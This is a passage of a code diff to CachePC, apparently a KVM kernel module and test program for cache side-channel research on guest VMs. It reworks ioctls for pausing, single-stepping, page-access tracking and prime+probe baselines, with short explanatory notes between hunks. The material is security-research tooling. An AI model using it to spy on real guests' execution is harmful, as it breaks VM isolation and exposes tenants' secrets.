+ cachepc_singlestep = false;
+ cachepc_singlestep_reset = false;
- return cachepc_handle_ack_event_ioctl(eventid);
+ switch (mode) {
+ case CPC_TRACK_FULL:
+ cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS);
+ cachepc_singlestep_reset = true;
+ cachepc_track_mode = CPC_TRACK_FULL;
+ break;
+ case CPC_TRACK_EXEC:
+ cachepc_track_all(vcpu, KVM_PAGE_TRACK_EXEC);
+ cachepc_singlestep_reset = true;
+ cachepc_track_mode = CPC_TRACK_EXEC;
+ break;
+ case CPC_TRACK_FAULT_NO_RUN:
+ cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS);
+ cachepc_track_mode = CPC_TRACK_FAULT_NO_RUN;
+ break;
+ default:
+ cachepc_track_mode = CPC_TRACK_NONE;
+ break;
+ }
+
+ return 0;
}
// int
+// cachepc_kvm_track_page_ioctl(void __user *arg_user)
+// {
+// struct cpc_track_config cfg;
+// struct kvm_vcpu *vcpu;
+//
+// if (!main_vm || !arg_user) return -EINVAL;
+//
+// if (copy_from_user(&cfg, arg_user, sizeof(cfg)))
+// return -EFAULT;
+//
+// if (cfg.mode < 0 || cfg.mode >= KVM_PAGE_TRACK_MAX)
+// return -EINVAL;
+//
+// BUG_ON(xa_empty(&main_vm->vcpu_array));
+// vcpu = xa_load(&main_vm->vcpu_array, 0);
+// if (!cachepc_track_single(vcpu, cfg.gfn, cfg.mode))
+// return -EFAULT;
+//
+// return 0;
+// }
+//
+// int
// cachepc_kvm_track_range_start_ioctl(void __user *arg_user)
// {
// if (!arg_user) return -EINVAL;
@@ -701,41 +616,16 @@ cachepc_kvm_ack_event_ioctl(void __user *arg_user)
// }
int
-cachepc_kvm_vm_pause_ioctl(void __user *arg_user)
+cachepc_kvm_poll_event_ioctl(void __user *arg_user)
{
- uint64_t deadline;
- int err;
-
- if (!arg_user) return -EINVAL;
-
if (!cachepc_events_init)
return -EINVAL;
- cachepc_pause_vm = true;
-
- deadline = ktime_get_ns() + 20000000000ULL; /* 20s in ns */
- while (true) {
- write_lock(&cachepc_event_lock);
- if (cachepc_event_avail) {
- err = copy_to_user(arg_user, &cachepc_event,
- sizeof(struct cpc_event));
- cachepc_event_avail = false;
- write_unlock(&cachepc_event_lock);
- return 0;
- }
- write_unlock(&cachepc_event_lock);
- if (ktime_get_ns() > deadline) {
- CPC_WARN("Timeout waiting for pause event\n");
- cachepc_pause_vm = false;
- return -EFAULT;
- }
- }
-
- return err;
+ return cachepc_handle_poll_event_ioctl(arg_user);
}
int
-cachepc_kvm_vm_resume_ioctl(void __user *arg_user)
+cachepc_kvm_ack_event_ioctl(void __user *arg_user)
{
uint64_t eventid;
@@ -747,11 +637,19 @@ cachepc_kvm_vm_resume_ioctl(void __user *arg_user)
if (copy_from_user(&eventid, arg_user, sizeof(eventid)))
return -EFAULT;
- cachepc_pause_vm = false;
-
return cachepc_handle_ack_event_ioctl(eventid);
}
+int
+cachepc_kvm_req_pause_ioctl(void __user *arg_user)
+{
+ if (arg_user) return -EINVAL;
+
+ cachepc_pause_vm = true;
+
+ return 0;
+}
+
long
cachepc_kvm_ioctl(struct file *file, unsigned int ioctl, unsigned long arg)
{
@@ -775,36 +673,28 @@ cachepc_kvm_ioctl(struct file *file, unsigned int ioctl, unsigned long arg)
return cachepc_kvm_calc_baseline_ioctl(arg_user);
case KVM_CPC_APPLY_BASELINE:
return cachepc_kvm_apply_baseline_ioctl(arg_user);
- // case KVM_CPC_SINGLE_STEP:
- // return cachepc_kvm_single_step_ioctl(arg_user);
case KVM_CPC_VMSA_READ:
return cachepc_kvm_vmsa_read_ioctl(arg_user);
case KVM_CPC_SVME_READ:
return cachepc_kvm_svme_read_ioctl(arg_user);
- case KVM_CPC_TRACK_MODE:
- return cachepc_kvm_track_mode_ioctl(arg_user);
- // case KVM_CPC_TRACK_PAGE:
- // return cachepc_kvm_track_page_ioctl(arg_user);
- // case KVM_CPC_TRACK_ALL:
- // return cachepc_kvm_track_all_ioctl(arg_user);
- // case KVM_CPC_UNTRACK_ALL:
- // return cachepc_kvm_untrack_all_ioctl(arg_user);
case KVM_CPC_RESET_TRACKING:
return cachepc_kvm_reset_tracking_ioctl(arg_user);
+ case KVM_CPC_TRACK_MODE:
+ return cachepc_kvm_track_mode_ioctl(arg_user);
case KVM_CPC_POLL_EVENT:
return cachepc_kvm_poll_event_ioctl(arg_user);
case KVM_CPC_ACK_EVENT:
return cachepc_kvm_ack_event_ioctl(arg_user);
+ // case KVM_CPC_TRACK_PAGE:
+ // return cachepc_kvm_track_page_ioctl(arg_user);
// case KVM_CPC_TRACK_RANGE_START:
// return cachepc_kvm_track_range_start_ioctl(arg_user);
// case KVM_CPC_TRACK_RANGE_END:
// return cachepc_kvm_track_range_end_ioctl(arg_user);
// case KVM_CPC_TRACK_EXEC_CUR:
// return cachepc_kvm_track_exec_cur_ioctl(arg_user);
- case KVM_CPC_VM_PAUSE:
- return cachepc_kvm_vm_pause_ioctl(arg_user);
- case KVM_CPC_VM_RESUME:
- return cachepc_kvm_vm_resume_ioctl(arg_user);
+ case KVM_CPC_VM_REQ_PAUSE:
+ return cachepc_kvm_req_pause_ioctl(arg_user);
default:
return kvm_arch_dev_ioctl(file, ioctl, arg);
}
@@ -827,9 +717,9 @@ cachepc_kvm_setup_test(void *p)
cachepc_kvm_system_setup();
- cachepc_kvm_prime_probe_test(NULL);
+ cachepc_kvm_prime_probe_test();
+ cachepc_kvm_stream_hwpf_test();
cachepc_kvm_single_eviction_test(NULL);
- cachepc_kvm_stream_hwpf_test(NULL);
exit:
put_cpu();
@@ -843,10 +733,11 @@ cachepc_kvm_init(void)
cachepc_ctx = NULL;
cachepc_ds = NULL;
- cachepc_retinst = 0;
cachepc_debug = false;
- cachepc_single_step = false;
+ cachepc_retinst = 0;
+ cachepc_singlestep = false;
+ cachepc_singlestep_reset = false;
cachepc_track_mode = CPC_TRACK_NONE;
cachepc_inst_fault_gfn = 0;
diff --git a/cachepc/uapi.h b/cachepc/uapi.h
@@ -33,8 +33,7 @@
#define KVM_CPC_POLL_EVENT _IOWR(KVMIO, 0x48, struct cpc_event)
#define KVM_CPC_ACK_EVENT _IOWR(KVMIO, 0x49, __u64)
-#define KVM_CPC_VM_PAUSE _IO(KVMIO, 0x50)
-#define KVM_CPC_VM_RESUME _IO(KVMIO, 0x51)
+#define KVM_CPC_VM_REQ_PAUSE _IO(KVMIO, 0x50)
enum {
CPC_EVENT_NONE,
@@ -51,6 +50,7 @@ enum {
enum {
CPC_TRACK_NONE,
+ CPC_TRACK_FAULT_NO_RUN,
CPC_TRACK_EXEC,
CPC_TRACK_FULL,
};
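
With the synchronous pause/resume pair gone, userspace now requests a pause
and handles it like any other event. A condensed sketch of the handshake,
mirroring the test/kvm-step.c changes below (kvm_dev is an open fd to the
kvm device; the uapi include path is illustrative):

	#include <err.h>
	#include <errno.h>
	#include <sys/ioctl.h>

	#include "cachepc/uapi.h"

	/* Request a pause and wait for the matching event, acking any
	 * unrelated events that arrive first. Returns with the vCPU held;
	 * acking event->id afterwards releases it, since the ack handler
	 * now clears cachepc_pause_vm (see the event.c hunk above). */
	void
	vm_req_pause(int kvm_dev, struct cpc_event *event)
	{
		int ret;

		ret = ioctl(kvm_dev, KVM_CPC_VM_REQ_PAUSE);
		if (ret) err(1, "ioctl KVM_CPC_VM_REQ_PAUSE");

		while (1) {
			ret = ioctl(kvm_dev, KVM_CPC_POLL_EVENT, event);
			if (ret && errno == EAGAIN) continue;
			if (ret) err(1, "ioctl KVM_CPC_POLL_EVENT");
			if (event->type == CPC_EVENT_PAUSE) break;
			ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event->id);
			if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT");
		}
	}
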
diff --git a/test/kvm-step.c b/test/kvm-step.c
@@ -112,15 +112,20 @@ main(int argc, const char **argv)
printf("VM start\n");
- ret = ioctl(kvm.vcpufd, KVM_RUN, NULL);
- if (ret < 0) err(1, "KVM_RUN");
+ do {
+ ret = ioctl(kvm.vcpufd, KVM_RUN, NULL);
+ if (ret < 0) err(1, "KVM_RUN");
+
+ if (kvm.run->exit_reason == KVM_EXIT_HLT)
+ printf("VM halt\n");
+ } while (kvm.run->exit_reason == KVM_EXIT_HLT);
printf("VM exit\n");
} else {
pin_process(0, SECONDARY_CORE, true);
- /* single step and log all accessed pages */
- arg = CPC_TRACK_FULL;
+ /* capture baseline by just letting it fault over and over */
+ arg = CPC_TRACK_FAULT_NO_RUN;
ret = ioctl(kvm_dev, KVM_CPC_TRACK_MODE, &arg);
if (ret) err(1, "ioctl KVM_CPC_TRACK_MODE");
@@ -133,12 +138,24 @@ main(int argc, const char **argv)
/* run vm while baseline is calculated */
eventcnt = 0;
- while (eventcnt < 30) {
+ while (eventcnt < 50) {
eventcnt += monitor(&kvm, true);
}
- ret = ioctl(kvm_dev, KVM_CPC_VM_PAUSE, &event);
- if (ret) err(1, "ioctl KVM_CPC_VM_PAUSE");
+ ret = ioctl(kvm_dev, KVM_CPC_VM_REQ_PAUSE);
+ if (ret) err(1, "ioctl KVM_CPC_VM_REQ_PAUSE");
+
+ while (1) {
+ ret = ioctl(kvm_dev, KVM_CPC_POLL_EVENT, &event);
+ if (ret && errno == EAGAIN) continue;
+ if (ret) err(1, "ioctl KVM_CPC_POLL_EVENT");
+
+ if (event.type == CPC_EVENT_PAUSE) break;
+
+ printf("Skipping non-pause event..\n");
+ ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event.id);
+ if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT");
+ }
arg = false;
ret = ioctl(kvm_dev, KVM_CPC_CALC_BASELINE, &arg);
@@ -151,17 +168,22 @@ main(int argc, const char **argv)
print_counts(baseline);
printf("\n");
print_counts_raw(baseline);
- printf("\n");
+ printf("\n\n");
arg = true;
ret = ioctl(kvm_dev, KVM_CPC_APPLY_BASELINE, &arg);
if (ret) err(1, "ioctl KMV_CPC_APPLY_BASELINE");
- ret = ioctl(kvm_dev, KVM_CPC_VM_RESUME, &event.id);
- if (ret) err(1, "ioctl KVM_CPC_VM_RESUME");
+ /* single step and log all accessed pages */
+ arg = CPC_TRACK_FULL;
+ ret = ioctl(kvm_dev, KVM_CPC_TRACK_MODE, &arg);
+ if (ret) err(1, "ioctl KVM_CPC_TRACK_MODE");
+
+ ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event.id);
+ if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT");
eventcnt = 0;
- while (eventcnt < 30) {
+ while (eventcnt < 50) {
eventcnt += monitor(&kvm, false);
}
diff --git a/test/kvm-step_guest.S b/test/kvm-step_guest.S
@@ -6,13 +6,17 @@
.global guest_stop
guest_start:
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
+ mov $(L1_LINESIZE * (L1_SETS + 9)), %rbx
+# hlt
+# mov $(L1_LINESIZE * (L1_SETS + 10)), %rbx
+ mov $(L1_LINESIZE * (L1_SETS + 11)), %rbx
+# hlt
+# mov $(L1_LINESIZE * (L1_SETS + 12)), %rbx
+ mov $(L1_LINESIZE * (L1_SETS + 13)), %rbx
+# hlt
+# mov $(L1_LINESIZE * (L1_SETS + 14)), %rbx
+ mov $(L1_LINESIZE * (L1_SETS + 15)), %rbx
+ hlt
jmp guest_start
guest_stop:
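
The immediates above select distinct L1 sets (9, 11, 13, 15) so that each
single-stepped mov produces one eviction in a known set. As a quick reference,
the address-to-set mapping (a sketch; constants per the topology verified in
cachepc_verify_topology, i.e. 64-byte lines and 64 sets on this CPU):

	#include <stdint.h>

	#define L1_LINESIZE 64 /* assumed, per cachepc_verify_topology */
	#define L1_SETS     64

	/* Strip the line offset, wrap by the set count:
	 * L1_LINESIZE * (L1_SETS + 9) therefore lands in set 9. */
	uint32_t
	l1_set(uintptr_t addr)
	{
		return (addr / L1_LINESIZE) % L1_SETS;
	}
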